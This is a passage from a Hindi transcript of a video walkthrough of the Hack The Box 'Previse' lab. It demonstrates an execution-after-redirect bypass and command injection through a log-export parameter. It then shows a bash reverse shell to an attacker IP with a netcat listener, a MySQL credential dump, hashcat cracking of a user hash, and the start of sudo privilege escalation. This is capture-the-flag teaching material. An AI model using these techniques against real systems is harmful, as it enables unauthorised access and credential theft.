हेलो गाइस, वेलकम बैक टू आवर चैनल। आई होप आप सब लोग मस्त हो। आज हम लोग हैक द बॉक्स का प्रीवाइज लैब सॉल्व करने वाले हैं। ये लैब एक लिनक्स बेस्ड लैब है और इसमें हम लोग एक वेब का वनरेबिलिटी भी सीखने वाले हैं। ठीक है, सो एज यूजुअल हम लोग अनमैप स्कैन के साथ शुरुआत करेंगे। मैंने ऑलरेडी अनमैप स्कैन लगा के रखा है इन आर काली मशीन। और यहाँ पे आप देख सकते हो कि दो पोर्ट्स ओपन मिला है, दैट इज पोर्ट नंबर 22 एंड पोर्ट नंबर 18, दैट इज HTTP पोर्ट। सो हम लोग सबसे पहले क्या करेंगे, हम लोग इस वेबसाइट को ब्राउज़र में ओपन कर लेते हैं। ठीक है, सो मैं फायरफॉक्स को ओपन कर लेता हूँ। यहाँ पे हम लोग सिंपली सबसे पहले यहाँ पे बबसूट ऑन दिख रहा है, इसको डिसेबल कर देते हैं एंड यहाँ पे http:// हमारा टारगेट मशीन का IP एड्रेस डाल देते हैं। ठीक है, पोर्ट नंबर 80 इसके लिए हम लोग ने HTTP दिया, सिंपल। अब यहाँ पे एक लॉगिन पेज दिख रहा है, सो वी कैन ट्राई डिफॉल्ट क्रेडेंशियल्स लाइक एडमिन एंड एडमिन। सो यहाँ पे आ रहा है इनवैलिड यूज़र नेम और पासवर्ड। सो वी कैन सी यहाँ पे ऐसे ज़्यादा कुछ चीज़ें हमको दिखाई नहीं दे रहा है। एंड जैसे हम लोग व्यू पे सोर्स करें तो बस इनवैलिड यूज़र नेम एंड पासवर्ड लिखा हुआ दिखाई दे रहा है। ठीक है, सो यहाँ पे ऐसा कोई ज़्यादा चीज़ें है नहीं। सो हम लोग आगे जाके क्या कर सकते हैं, वी कैन रन अ डायरेक्टरी सर्च स्कैन। तो हम लोग डायरेक्टरी सर्च का स्कैन लगा देते हैं, dir सर्च -u एंड हमारे टारगेट का पाथ दे देंगे विद द IP एड्रेस। ये सब हटा देते हैं, एंटर करेंगे, स्कैन को कंप्लीट होने देंगे, देखते हैं हम लोग को कौन सा डायरेक्टरीज मिलता है इसमें। एंड देन मे बी हम लोग को कोई और हिंट मिल जाए जिसके थ्रू हम लोग लॉगिन कर पाए। ठीक है, सिंपल। जब तक ये स्कैन रन हो रहा है हम लोग एक और चीज़ क्या कर सकते हैं, हम लोग बबसूट को ऑन कर देते हैं ताकि हम लोग रिक्वेस्ट को एनालाइज कर पाए कि एग्जैक्टली रिक्वेस्ट जा कैसे रहा है। ठीक है, ठीक है, बबसूट चालू हो गया है। प्रॉक्सी को हम लोग कनेक्ट कर लेते हैं, यहाँ पे टर्न ऑन करते हैं एंड एक बार रिक्वेस्ट को कैप्चर करके देखते हैं कि एग्जैक्टली रिक्वेस्ट जा कैसे रहा। सो विल गो इन प्रॉक्सी, टर्न ऑन कर दूंगा एंड यहाँ पे जाके मैं लॉगिन करूँगा। सो रिक्वेस्ट एकदम सिंपल है, यहाँ पे यूज़र नेम जा रहा है एंड पासवर्ड जा रहा है इन क्लियर टेक्स्ट फॉर्मेट। ठीक है, सो अगर आप वेब पेन टेस्टिंग कर रहे हो, आप किसी बैंकिंग एप्लीकेशन का टेस्टिंग करते हो, ये भी एक वल्नरेबिलिटी है कि यूज़र नेम डिटेल्स क्लियर टेक्स्ट फॉर्मेट में जा रहा है। ठीक है, जाना नहीं चाहिए, इंक्रिप्टेड वे में जाना चाहिए। फाइन। सो एक और चीज़ हम लोग क्या कर सकते हैं, मैं इसको रिपीटर में डाल के रखता हूँ एंड हम लोग यहाँ पे इसका डू इंटरसेप्ट रिस्पॉन्स कर सकते हैं ताकि हम लोग इसका रिस्पॉन्स यहीं पे देख पाए। सो यहाँ पे 200 ओके नॉर्मल रिस्पॉन्स आ रहा है, रिस्पॉन्स में अपाचे का सर्वर वर्जन दिखाई दे रहा है। एज सच इसके अलावा कोई डिटेल्स यहाँ पे है नहीं। सो हम लोग को जो पेजेस मिला था उसके ऊपर अभी हम लोग ध्यान देते हैं। सो यहाँ पे config.php भी मिला है बट जिसका वैल्यू 0 बाइट, फुटर मिला है, हेडर मिला है, जेएस मिला है, login.php मिला है जो अभी हम लोग यूज़ कर रहे थे। सो लेट्स सी कि हम लोग accounts.php पे क्या देख पा रहे हैं। कॉपी करते हैं एंड हम लोग सिंपली यहाँ पे जाएंगे, विल पेस्ट दिस। ठीक है, एंटर करते हैं। आई थिंक सो प्रॉक्सी चालू है, प्रॉक्सी को ऑफ कर देते हैं एंड वी कैन सी ये वापस से login.php पे रीडायरेक्ट होगा, दैट मीन्स रीडायरेक्ट हो रहा है यहाँ पे। सो यहाँ पे अभी हम लोग एक नया वनरेबिलिटी सीखेंगे, क्या है देखना, ध्यान से देखना। ठीक है, सो अब मैं जैसे ही यहाँ पे accounts.php डाल रहा हूँ, एंटर करूँगा, मैंने रिक्वेस्ट को कैप्चर कर लिया accounts.php का। अभी मैं इसको करूँगा डू इंटरसेप्ट रिस्पॉन्स एंड फॉरवर्ड करूँगा। फॉरवर्ड करने के बाद यहाँ पे क्या रिक्वेस्ट दिख रहा है, 3302 दिखाई दे रहा है। अभी ये वनरेबिलिटी एग्जैक्टली है क्या, इसको बोलते हैं EAR अटैक। EAR इज एग्जीक्यूशन आफ्टर रीडायरेक्शन। सो अभी यहाँ पे क्या कर रहे हैं, 302 मतलब क्या होता है, सो ये कोड का मतलब क्या होता है कि हम लोग रीडायरेक्ट कर रहे हैं। दैट इज आपका जो वेब एप्लीकेशन है वो पर्टिकुलर URL पे रीडायरेक्ट कर रहे हैं। ठीक है, सो यहाँ पे 302 रीडायरेक्ट कर रहा है, लेकिन यहाँ पे अगर आप नीचे डिटेल्स में जाओगे सो आपको यहाँ पे क्या क्या दिख रहा है। यहाँ पे हम लोग को बेसिकली accounts.php का सोर्स कोड दिखाई दे रहा है। इफ यू कैन सी क्या क्या दिखाई दे रहा है अभी हम लोग को, यहाँ पे अकाउंट्स, क्रिएट अकाउंट का ऑप्शन दिख रहा है, फाइल का दिख रहा है, मैनेजमेंट मेन्यू, वेबसाइट स्टेटस, लॉग डेटा। ये हम लोग को हमारे लॉगिन पेज पे नहीं दिखाई दे रहा था बट यहाँ पे ये चीज़ दिखाई दे रहा है। तो इसको क्या बोलते हैं, एग्जीक्यूशन आफ्टर रीडायरेक्शन बोलते हैं। ठीक है, EAR करके बोलते हैं। सो हम लोग अभी यहाँ पे इसको कैसे कैसे कर सकते हैं, अगर आपको देखना है कि एग्जैक्टली EAR होता क्या है, सो हम लोग यहाँ पे जाके बेसिकली सर्च कर सकते हैं कि EAR क्या होता है। एक मिनट में सबसे पहले इसका रिक्वेस्ट को इंटरसेप्ट ऑफ करता हूँ एंड EAR अटैक अगर हम लोग सर्च करें यू कैन गेट अ मल्टीपल बोल सकते हैं आर्टिकल्स देखने को मिल सकता है रिलेटेड टू दिस अटैक।
यार अटैक मीडियम ऐसे क्यों आ रहा है? अगर हम लोग फुल फॉर्म डालें एग्जीक्यूशन आफ्टर रीडायरेक्शन, हाँ ओके. So an attack where an attacker ignores, redirects and retrieves sensitive content intended from a authenticated user. So अभी एक्चुअली वो जो पेज हम लोग को दिख रहा था accounts.php, वो किसको दिखना चाहिए था? जो यूज़र ऑथेंटिकेटेड है. बट यहाँ पे विदाउट ऑथेंटिकेशन वी आर एबल टू सी व्हाट आर द फंक्शनलिटीज दैट आर एक्सेसिबल टू द ऑथेंटिकेटेड यूज़र, जो कि वहाँ पे पेज के सोर्स कोड में हमको दिखाई दे रहा था. सो हम लोग इसका यूज़ कैसे कर सकते हैं? मे बी हम लोग इसके थ्रू क्या क्या कर सकते हैं अभी देखते हैं. ठीक है, रिक्वेस्ट को इंटरसेप्ट ऑन करते हैं एंड वापस हम लोग यहाँ पे क्या करेंगे, विल गो हियर एंड यहाँ पे हम लोग डालेंगे अकाउंट्स डॉट पी एच पी. अभी रिक्वेस्ट यहाँ पे ऑफ कर दिया हम लोग ने, अकाउंट्स डॉट पी एच पी, रिक्वेस्ट कैप्चर हो गया. डू इंटरसेप्ट रिस्पॉन्स करते हैं, फॉरवर्ड करें. अभी देखो यहाँ पे ये पेज लोड होने पे क्या डेटा आना चाहिए वो तो दिख गया हम लोग को, वो यहाँ पे कोड में आ रहा है. बस 302 मतलब यह क्या कर रहा है? रीडायरेक्ट कर रहा है. सो अगर मैं 302 को हटा के इफ आई पुट 200 ओके स्टेटस कोड, तो इसका मतलब क्या है? ये वाला पेज वो डिस्प्ले करेगा. एंड अगर मैं इंटरसेप्ट को ऑफ करूँ और 200 ओके के साथ रिक्वेस्ट को भेजूँ, तो हम लोग यहाँ पे देख सकते हैं हम लोग को वो पेज यहाँ पे डिस्प्ले हो रहा है. क्यों हो रहा है? क्योंकि इसका सोर्स कोड ऑलरेडी रिक्वेस्ट में दिख रहा था. इसको ही क्या बोलते हैं? एग्जीक्यूशन आफ्टर रीडायरेक्शन अटैक बोलते हैं. ठीक है, जहाँ पे क्या होता है, अटैकर इग्नोर करता है रीडायरेक्शन को एंड डेटा रिट्रीव करते हैं. तो हम लोग ने डेटा रिट्रीव करके यहाँ पे डिस्प्ले कर दिया. अभी यहाँ पे क्रिएट यूज़र का ऑप्शन दिख रहा है. सो वी कैन ट्राई टू क्रिएट अ यूज़र. जैसे कि हम लोग अगर एडमिन यूज़र क्रिएट करते हैं विद पासवर्ड एडमिन एंड एडमिन कंफर्म करेंगे एंड क्रिएट यूज़र करेंगे, डोंट सर्व के ऊपर करते हैं. तो इसने लॉगिन पेज पे डाल दिया. नाउ लेट्स सी हमने जो यूज़र क्रिएट किया था वो यूज़र यहाँ पे क्रिएट हुआ है कि नहीं. लॉगिन के ऊपर क्लिक करूँगा एंड हम लोग लॉग इन हो गए. दिख रहा है प्रीवाइज फाइल होस्टिंग करके ये डैशबोर्ड ओपन हो गया. सिंपल था. कैसे अटैक करती है ER समझा. सो ER के थ्रू हम लोग को वेबसाइट का एक्सेस मिला. अभी यहाँ पे मल्टीपल फंक्शनलिटीज़ है, एक एक फंक्शनलिटी को देखते हैं. सबसे पहले एडमिन दिख रहा है. सो अगर हम लोग एडमिन के ऊपर जाए, एडमिन के ऊपर कुछ हो नहीं रहा है. मैनेजमेंट मेन्यू दिख रहा है जहाँ पे वेबसाइट का स्टेटस दिख रहा है. वेबसाइट स्टेटस पे जाए, स्टेटस डॉट PHP, ये भी हम लोग को यहाँ पे मिला था राइट. या स्टेटस डॉट PHP भी मिला था हम लोग को. सो यहाँ पे क्या दिख रहा है? माई SQL सर्वर इज़ ऑनलाइन एंड कनेक्टेड दिख रहा है. लॉग डेटा करके एक फंक्शनलिटी है, ये भी यहाँ पे दिख रहा है. तो अगर मैं सबमिट करूँ, सबमिट करने पे क्या हो रहा है? ओके, सो इट इज़ डाउनलोडिंग अ फाइल, दैट इज़ अ लॉग फाइल डाउनलोड कर रहा है वो. ठीक है. एंड अगर मैं फाइल्स पे जाऊँ, सो यहाँ पे अपलोडेड फाइल में साइड बैकअप डॉट जिप दिख रहा है. ठीक है, तो अगर मैं इसके ऊपर क्लिक करूँगा, सो ये फाइल भी डाउनलोड हो गया. बट वी कैन डू, हम लोग इसको फटाक से एक जिप बैकअप जिप फाइल दिख रहा है तो हम लोग इसको मूव करते हैं टू अ डेस्कटॉप, देन HTTP रिवाइज एंड यहाँ पे इसको मूव कर देते हैं. ठीक है, अभी हम लोग जाते हैं, प्लस करते हैं, यहाँ पे दिख रहा है. सो साइड बैकअप डॉट जिप, इसको अनजिप करेंगे. अनजिप, सबसे पहले एक फोल्डर बनाते हैं mkdir बैकअप अंडरस्कोर साइट. ठीक है, और अभी इसको अनजिप साइड बैकअप टू बैकअप. ठीक है, सो वहाँ पे वो आ गया रहेगा. अभी अगर हम लोग CD बैकअप अंडरस्कोर साइट करें एंड ls करें, oh it's not there, file name does not match आया, सॉरी मैंने देखा नहीं. ls cd dot ls, ओके. सो ये ऐसे नहीं होगा. सो अगर मैं यहीं पे अनजिप कर दूँ इसको, ठीक है, मैंने यहीं पे अनजिप किया, वैसे नहीं होता. मे बी मैं गलत था, कोई बात नहीं. ठीक है, तो हम लोग ने इसको अनजिप कर लिया. अभी यहाँ पे बहुत सारा चीज़ें आ गया, जैसे कि अकाउंट्स डॉट PHP है, कॉन्फिग डॉट PHP है, फाइल लॉग डॉट PHP है, फुटर PHP है, लॉग आउट है, नाव है. तो हम लोग क्या कर सकते हैं,
वी कैन गो थ्रू ईच एंड एवरी फाइल एंड हम लोग देख सकते हैं वहाँ पे हम लोग को कुछ मिलता है कि नहीं। सबसे पहले मेरे को फिशी लग रहा है config डॉट पी एच पी। सो मैं यहाँ पे जाता हूँ, कैट config डॉट पी एच पी पे जाता हूँ एंड वी कैन सी यहाँ पे हम लोग को क्या मिल रहा है, यूज़र मिल गया, रूट एंड पासवर्ड मिल गया माई स्केल का, बेसिकली माई स्केल डी का पासवर्ड मिल गया। सो हम लोग इसको सेव करते हैं, कॉपी करते हैं। आई विल क्रिएट वन फाइल विद द नेम ऑफ क्रेड, नानो क्रेड कर दूंगा, रूट कोलन यहाँ पे उसका पासवर्ड पेस्ट कर दूंगा एंड कंट्रोल एक्स करके सेव करते हैं। अभी अगर मैं कैट क्रेड करूँ सो वी कैन सी हमने क्रेडेंशियल्स को यहाँ पे स्टोर कर दिया है, ठीक है। अकाउंट्स डॉट पी एच पी, अगर मैं कैट अकाउंट्स डॉट पी एच पी करूँ सो यहाँ पे वो अकाउंट डॉट पी एच पी का पेज दिखाई दे रहा है, ठीक है। क्लियर कर देते हैं एंड और क्या देख सकते हैं हम लोग, डाउनलोड डॉट पी एच पी है, फाइल लॉग्स डॉट पी एच पी करके एक है, इसको देखते हैं। कैट फाइल अंडर स्कोर लॉग डॉट पी एच पी एंटर करते हैं। अगेन यहाँ पे एक नॉर्मल सा पेज है जो कि कुछ डिस्प्ले कर रहा है, ठीक है। आप देख सकते हैं यहाँ पे पी लिखा हुआ है, दैट इज़ पैराग्राफ, देन फॉर्म दिया हुआ है। सो ये वो वाला पेज है, बेसिकली ये वाला पेज है वो लॉग डेटा वाला, ये वाला पेज वो है, ठीक है। एंड एक और लॉग के नाम पे था, दैट इज़ कैट लॉग्स डॉट पी एच पी। अगर मैं कैट लॉग्स डॉट पी एच पी करूँ सो यहाँ पे कुछ कोड मिल रहा है जहाँ पे वो क्या चेक कर रहा है कि सेशन है कि नहीं है, मतलब बेटी चेकिंग की यूज़र का सेशन होना चाहिए। देन रिक्वेस्ट नॉट सर्वर, ओके, रिक्वेस्ट पोस्ट होना चाहिए, ये चेक कर रहा है। सो यहाँ पे ये थोड़ा सा गलत है, सिंटैक्स यहाँ पे नॉट इक्वल टू अगर पोस्ट हो तो लॉगिन पे लॉगिन डॉट पी एच पी पे जाना चाहिए। यहाँ पे ये थोड़ा कोडिंग में मिस्टेक है, जिनको कोडिंग आता है थोड़ी बहुत बेसिक समझ गए रहेंगे, ठीक है। ये जो एक्सक्लेमेशन है यहाँ पे चाहिए। इसके अलावा यहाँ पे क्या लिखा है, ट्राइड रियली हार्ड टू पास द लॉग डेलिन इन पी एच पी बट पाइथन वॉज सो मच ईजियर। ओके, सो इन्होंने ये जो डेलिन करके जो है वेरिएबल, वो विद हेल्प ऑफ पाइथन स्क्रिप्ट के साथ पास किया है एंड देन इनको आउटपुट किया है। सो आउटपुट कैसे कर रहे हैं, सो यहाँ पे ये देख सकते हैं आप, कमांड इंजेक्शन हो रहा है जहाँ पे ये पाइथन का यूज़ कर रहे हैं एट द बैक एंड सर्वर एंड लॉग प्रोसेस डॉट पी वाई करके एक फाइल है, उसका यूज़ करके उसमें ये पोस्ट पैरामीटर पास करें डेलिन, ठीक है। एंड देन वो आउटपुट आ रहा है एंड ओके दिस इज़ द रिस्पॉन्स हेडर्स, वो सब ये है। सो यहाँ पे हम लोग बेसिकली ये कर सकते हैं, ठीक है। एंड ओके, अभी हम लोग नेक्स्ट चीज़ क्या कर सकते हैं, हम लोग इसका रिक्वेस्ट कैप्चर करते हैं, ठीक है। अगर मैं बबसूट में जाऊँ, इंटरसेप्ट ऑन करूँ एंड यहाँ पे जाके मैं इसका रिक्वेस्ट कैप्चर करता हूँ सबमिट का एंड मैं इसको करता हूँ रिपीटर को सेंड, इसको ड्रॉप कर देता हूँ पैकेज को, ठीक है। हम लोग यहाँ पे आ गए। अब मैंने जो रिपीटर में रिक्वेस्ट डाला, अगर मैं इसको सेंड करूँ, सी वी आर सिंपली गेटिंग अ डेटा, यहाँ पे हम लोग को डेटा मिल रहा है। अभी हम लोग और चीज़ क्या कर सकते हैं, यहाँ पे हम लोग ट्राई कर सकते हैं कमांड एग्जीक्यूशन। सो मे बी वो क्या कर रहा है, अभी अगर आप फॉर्मेट देखो सो ये फॉर्मेट के हिसाब से ये कमांड एग्जीक्यूट हो रहा है। सो दिस इज़ द पाइथन फाइल, देन दिस इज़ द प्रोसेस, देन दिस इज़ द पैरामीटर। अभी अगर मेरे को कोई एक और कमांड एग्जीक्यूट करना है सो आई कैन पुट अ सेमी कोलन देयर। सो मैं सेमी कोलन दे के मैं दूसरा कमांड एग्जीक्यूट करा सकता हूँ, ठीक है। तो मैं क्या करता हूँ, सेमी कोलन डालता हूँ एंड आई विल से स्लिप फॉर 5, ठीक है। सेमी कोलन के हाश दे देता हूँ एंड इसको हम लोग करेंगे प्लस एंड इसको हम लोग करेंगे प्लस। अभी अगर मैं इसको सेंड करूँ सो 1 2 3 4 5 एंड अभी इसके बाद हम लोग को ये दिखना चाहिए आप, सी it approximately takes a 55531 milliseconds, so 5 seconds. That means we can execute our commands यहाँ पे। Of course अगर मैं यहाँ पे who am I करूँ so हम लोग को डिटेल्स दिखने वाला है नहीं। क्यों नहीं दिखेगा, क्योंकि वो बैकग्राउंड में कमांड एग्जीक्यूट कर रहा है, यहाँ पे कुछ डिस्प्ले नहीं कर रहा है, बट वी हैव अ प्रॉपर कमांड इंजेक्शन हियर। सो हम लोग कमांड इंजेक्शन के थ्रू क्या कर सकते हैं, वी कैन ट्राई टू गेट शेल ऑफ जो भी यूज़र इसको एग्जीक्यूट कर रहा है उसका हम लोग शेल ले सकते हैं। कैसे ले सकते हैं, अगर मैं यहाँ पे जाऊँ एंड मैं अगर यहाँ पे जाके सर्च करूँ पेन टेस्ट मंकी, यहाँ पे रिवर्स शेल का चिट शीट है, इसके ऊपर जाता है एंड ये पहला ही हम लोग को मिल रहा है, ठीक है। तो हम लोग को इसको एग्जीक्यूट करना है। कैसे कर सकते हैं, सबसे पहले ये हु मैं हटा देता हूँ, यहाँ पे आएगा बेसिकली बैश -c, ठीक है। देन सिंगल कोट के अंदर हम लोग हमारा वो डाल देंगे पेलोड एंड सिंगल कोट क्लोज कर देंगे। अभी हम लोग को क्या करना है,
इसको कंट्रोल यू करके मैंने स्पेसेस को हटा दिया है एंड ये जो एम्परसेंड था उसको कन्वर्ट कर दिया। ठीक है, सिंपल है। अभी यहाँ पे इसकी जगह पे हमको हमारा टारगेट मशीन का आईपी एड्रेस, नॉट टारगेट, अटैकर मशीन का मतलब हमारा आईपी एड्रेस देना है जहाँ पे हम लोग को लिसन करना है। सो हम लोग हमारा देते दैट इज़ 10.10.14.6 एंड एट 80 की जगह पे मैं दे देता हूँ 4545। फाइन, एकदम सिंपल है। अभी इसके आगे मैं क्या कर सकता हूँ, अभी मेरे को नेट कट चालू करना पड़ेगा फॉर लिसनिंग पर्पज। सो मैं इसको क्लियर कर देता हूँ। आई विल सिंपली डू nc-lbnp 4545 ऑन द सेम पोर्ट एंड मैं यहाँ पे रिक्वेस्ट को सेंड करता हूँ। यहाँ पे रिस्पॉन्स आने में टाइम लग रहा है, वी कैन गो एंड चेक कि हम लोग को मिला है कि नहीं मिला है। सो यहाँ पे हम लोग को www-data से एक्सेस मिल गया है शेल का। ठीक है, सो या वी हैव द एक्सेस राइट। एलएस करेंगे तो वी कैन सी ये चीज़ है यहाँ पे दिख रहा है। हम लोग को क्लियर नहीं कर पाएंगे ऑफकोर्स क्योंकि दिस इज़ नॉट अ प्रॉपर शेल। सो हम लोग क्या कर सकते हैं, आई विल सिंपली से कंट्रोल जी देन stty echo raw राइट, इंटर कर दूंगा। echo hyphen raw था शायद, stty इज नॉट वर्किंग। अगर मैं नया टैब में जाऊँ, शायद कमांड गलत डालने की वजह से हो गया। सो लेट्स क्लोज दिस टैब एंड हम लोग वापस यहाँ पे जाते हैं nc-lbnp एंड 4545 करेंगे एंड सेंड कर दिया। हम लोग को यहाँ पे उसका एक्सेस मिल गया है। ठीक है, सो अभी हम लोग क्या कर सकते हैं, वी कैन ट्राई टू कन्वर्ट दिस टू प्रॉपर शेल जहाँ पे हम लोग सारा चीज़ें कर पाए, क्योंकि अभी यहाँ पे हम लोग क्लियर वो सब नहीं कर पाएंगे। बेसिकली अभी मैं क्या कर सकता हूँ, आई कैन सिंपली सेट दिस टू stty शेल। तो हम लोग वो करते हैं। ठीक है, सबसे पहले ठीक है, सो कैसे करेंगे, इसको कंट्रोल जी करना है। हम लोग ने इसको बैकग्राउंड में डाल दिया। अभी हम लोग सेट करेंगे stty raw hyphen echo। ठीक है, एंटर करेंगे। उसके बाद हम लोग को सिंपली करना है fg थोड़ा टाइम लेगा ये टाइप होने में, मे बी इज टेकिंग अ बिट टाइम। ओके, सो हम लोग को यहाँ पे शेल मिल गया है। जैसे हम लोग ने सेंड किया उसके बाद हम लोग को शेल मिल गया। अभी नेक्स्ट थिंग हम लोग को सबसे पहले क्या करना है, बैश शेल ले लेते हैं हम लोग। कैसे करेंगे, पाइथन -c import pty semicolon pty डॉट स्पॉन एंड डबल कोट में स्लैश बिन स्लैश बैश कर देंगे। ठीक है, कंफर्म कर दे कि हम लोग की ये बैश शेल ही है एंड या इंटर कर देंगे। सो या दिस इज़ अ बैश शेल। हम लोग को बैश शेल मिल चुका। हम लोग ने बेसिकली एक्सप्लिसिटली हम लोग ने बैश शेल को स्पॉन कर दिया। अभी हम लोग क्या कर सकते हैं, इस प्रोसेस को बैकग्राउंड में डालते हैं। कंट्रोल जी कर दिया हम लोग ने। उसके बाद stty raw hyphen echo fg एंटर एंटर एंड हम लोग को यहाँ पे प्रॉपर शेल मिल चुका है। ठीक है, अभी भी अगर मैं क्लियर करूँगा तो क्लियर नहीं होने वाला है। सो हम लोग को टर्म सेट करना पड़ेगा। तो कैसे करेंगे, एक्सपोर्ट टर्म इज इक्वल टू एक्स टर्म, एंटर के ऊपर क्लिक करेंगे एंड उस यहाँ पे सेट हो गया रहेगा। अभी अगर मैं क्लियर करता हूँ सो आई कैन क्लियर इट। ठीक है,
अभी और हम लोग क्या चीज़ कर सकते हैं, एल एस, ठीक है, यहाँ पे सारा वो फाइल्स है। हम लोग को माई स्किल का क्रेडेंशियल्स मिला था, तो हम लोग उसका यूज़ कर सकते हैं। तो अगर मैं एक नया टैब ओपन करूँ एंड यहाँ पे सिंपली डू कैट क्रेड, सो कैट करने के बाद हम लोग को यहाँ पे माई स्किल का क्रेडेंशियल्स मिल गया। आई विल सिंपली कॉपी दिस पासवर्ड एंड मैं लिखूँगा माई स्किल हाइफन यू, आई विल से रूट, इंटर करूँगा, पासवर्ड देना पड़ेगा हाइफन पी, इंटर करूँगा, अभी पासवर्ड पूछ रहा है, मैं पासवर्ड को पेस्ट कर दूँगा, एंटर, एंड यहाँ पे हम लोग को माइस्क्यूएल का शेल मिल गया। तो अगर मैं अभी करूँ शो डेटाबेसेस सेमीकोलन एंटर, यहाँ पे इंफॉर्मेशन स्कीमा है विच इज़ बाय डिफॉल्ट देयर इज माइस्क्यूएल परफॉर्मेंस स्कीमा प्रीवाइज एंड सिस। सो प्रीवाइज हमारे काम का है, सो हम लोग लेंगे यूज प्रीवाइज एंड सेमीकोलन, ठीक है। डेटाबेस चेंज हो गया, अभी मैं क्या कर सकता हूँ, शो टेबल्स सेमीकोलन एंटर, अकाउंट्स एंड फाइल्स नाम का है। सो वी कैन ट्राई फॉर द अकाउंट्स। तो अकाउंट्स के लिए हम लोग कैसे कर सकते हैं, सिलेक्ट स्टार फ्रॉम अकाउंट्स एंड सेमीकोलन एंटर। सो यहाँ पे हम लोग को दो यूज़र्स मिले, एक एडमिन और एक M4L वेयर करके। सो दोनों को हम लोग कॉपी करेंगे। सबसे पहले M4 वाले का हैश हम लोग क्रैक करने का कोशिश करते हैं। सो टू डू दिस हम लोग को क्या करना पड़ेगा, हम लोग को एक अलग से फाइल बनाना पड़ेगा जिसमें हम लोग वो हैश स्टोर करेंगे। सो मैं ये प्रीफर करता हूँ टू डू दिस ऑन द विंडोज़ मशीन। सो अगर आपको करना है तो आप कैसे कर सकते हो, शो मैं ऑलरेडी विंडोज़ पे दिखाता हूँ आपको। मेरे डेस्कटॉप पे यहाँ पे हैश कार्ड नाम का फोल्डर है। सो इसके अंदर मैंने ये टेस्ट डॉट हैश को ऑलरेडी रखा है, ठीक है। कैन सी, अगर मैं इसको नोट पैड में ओपन करूँ, सो कैन सी यहाँ पर मैंने वो हैश को पेस्ट किया था। किस फॉर्मेट में किया, यूज़र नेम कोलन एंड देन जो हैश है उसको पेस्ट किया, ठीक है। उसके बाद कमांड बहुत सिंपल होने वाला है, मैं इसको CMD में ओपन करूँगा ये पाथ को, कमांड विल बी हैश कैट डॉट exe। देन अभी ऑफकोर्स हम लोग को फॉर्मेट फाइंड करना है, तो वो हम लोग कैसे कर सकते थे, वी कैन गो ऑन गूगल। यहाँ पे हम लोग सबसे पहले इसका प्रॉक्सी बंद कर देते ताकि वेबसाइट कैप्चर ना करता रहे, एंड वी कैन से hashes एग्जांपल्स, एंड यहाँ पे आ गया कंट्रोल F $1। सो यहाँ पे देखो MD5 क्रिप्ट करके है, MD5 दैट इज़ 500 है। सो इसका M क्या आएगा, 500, मोड इज़ 500। सो अगर मैं वापस CMD में जाऊँ, सो आई विल सिंपली से -M 500, एंड उसके बाद आगे अभी क्या करेंगे हम लोग, हमारे टारगेट फाइल का नाम देना हम लोग को, दैट इज़ टेस्ट डॉट हैश फाइल था, एंड देन हमारे जो भी rocky.txt फाइल है, पासवर्ड लिस्ट है, उसका नाम देना हम लोग को, ठीक है। अगर मैं एंटर करूँगा सो मेरे को एक एरर आएगा कि नो हैश लोडेड। क्यों पता है, हम लोग ने एक फॉर्मेट दिया है दैट इज़ -, यूज़र फॉर्मेट। जैसे मैं ये करूँगा वो रन करना शुरू करेगा। अभी मैंने ये ऑलरेडी क्रैक करके रखा है, इसके लिए ऑल हैशेस फाउंड एज प्रोफाइल एंड और एम्प्टी एंट्रीज। सो अगर मेरे को चेक करना है, सो मेरे को क्या करना पड़ेगा, -, शो। जैसे मैं -, शो करता हूँ, सी ये मेरा हैश वैल्यू था, और इसको क्रैक करके क्या मिला, आई लव कोडी 11223335 एक्सक्लेमेशन, ठीक है। सो मैं इसको कॉपी कर लेता हूँ कोड को, एंड वी कैन, जो हम लोग को शेल मिला है उसमें हम लोग इसको यूज़ कर सकते हैं। अगर मैं एग्जिट करूँ अभी यहाँ पे, एंड आई कैन सिंपली से सू M4L वेयर, ये यूज़र का नाम था। सो हम लोग ये यूज़र में स्विच कर रहे हैं, एंड मैं यहाँ पे वो पासवर्ड पेस्ट कर देता हूँ, एंटर कर दिया। नाउ यू कैन सी मैं कौन से यूज़र से लॉग्ड इन हूँ, M4L वेयर करके, ठीक है। क्या कर सकते हैं हम लोग अभी, सबसे पहले लेट्स सी sudo -l करते हैं, लेट्स ट्राई टू फाइंड आउट कि हम लोग को कौन सा परमिशन है यहाँ पे। सो यहाँ पे एक फाइल है जो एज अ रूट रन हो रहा है, दैट इज़ access_backup.sh करके, ठीक है, ये फाइल। बिफोर दैट अगर आपको यूज़र का फ्लैग सबमिट करना है, सो वेयर यू कैन फाइंड दैट, यू कैन सिंपली गो sudo
डॉट स्लैश करें, अगर हम लोग यहाँ पे आए एल करें, सो वी कैन सी यहाँ पे टेम्प है, बहुत सारा चीज़ें होम है। सो अगर मैं सी डी होम करूँ देन एल एस, अभी हम लोग कौन सी यूज़र के अंदर है, एम फोर एल वेयर करके, तो सी डी एम फोर एल वेयर में जाऊँ, एल एस अभी यूज़र डॉट टी एक्स टी फाइल आपको मिल जाएगा। सो फॉर नाउ मैं सी डी टेम्प में जाता हूँ, ठीक है, सी डी स्लैश टेम्प क्लियर। ओके, वापस एक बार sudo -l करते हैं एंड पासवर्ड पेस्ट करते हैं। पासवर्ड का ज़रूरत नहीं, यहाँ पे हम लोग ने ऑलरेडी एक्सेस किया था तो यहाँ पे दिख रहा है। तो ऑप्ट स्क्रिप्ट्स के अंदर access अंडरस्कोर बैकअप डॉट sh नाम का फाइल है, ठीक है। लेट्स सी कि ये बैकअप डॉट sh नाम का फाइल क्या है, विच इज़ रनिंग एज एन रूट यूज़र और वी कैन से sudo यूज़र। सो कैसे कर सकते हैं हम लोग, सी डी लेट्स गो टू दिस ls करते हैं। सो यहाँ पे access अंडरस्कोर बैकअप डॉट sh नाम का फाइल है, उसको देखने के लिए सिंपली कैट करेंगे हम लोग। कैट करने के बाद यहाँ पे देखते हैं क्या क्या है, ठीक है। एक बैश स्क्रिप्ट है, विन ऑफ कोर्स डॉट sh है, तो यहाँ पे खाली क्या है, ऑलवेज मेक श्योर टू स्टोर लॉग्स, वी टेक सिक्योरिटी seriously here. I know I shouldn't run this as a root, but I can't figure out programmatically on my account. This is configured to run with a cron added to sudo so I can run as needed. We will fix it later when there is time. So यहाँ पे ये बेसिकली क्या कर रहा है, ये दो कमांड्स को एग्जीक्यूट कर रहा है, जो लॉग विद द हेल्प ऑफ gzip। सब ये याद रखना, जब भी आपके सामने ऐसा सिनेरियो आए जहाँ पे कोई तो लिनक्स का बाइनरी है वो रन हो रहा है इन अ कोड एंड तो आप लोग यहाँ पे 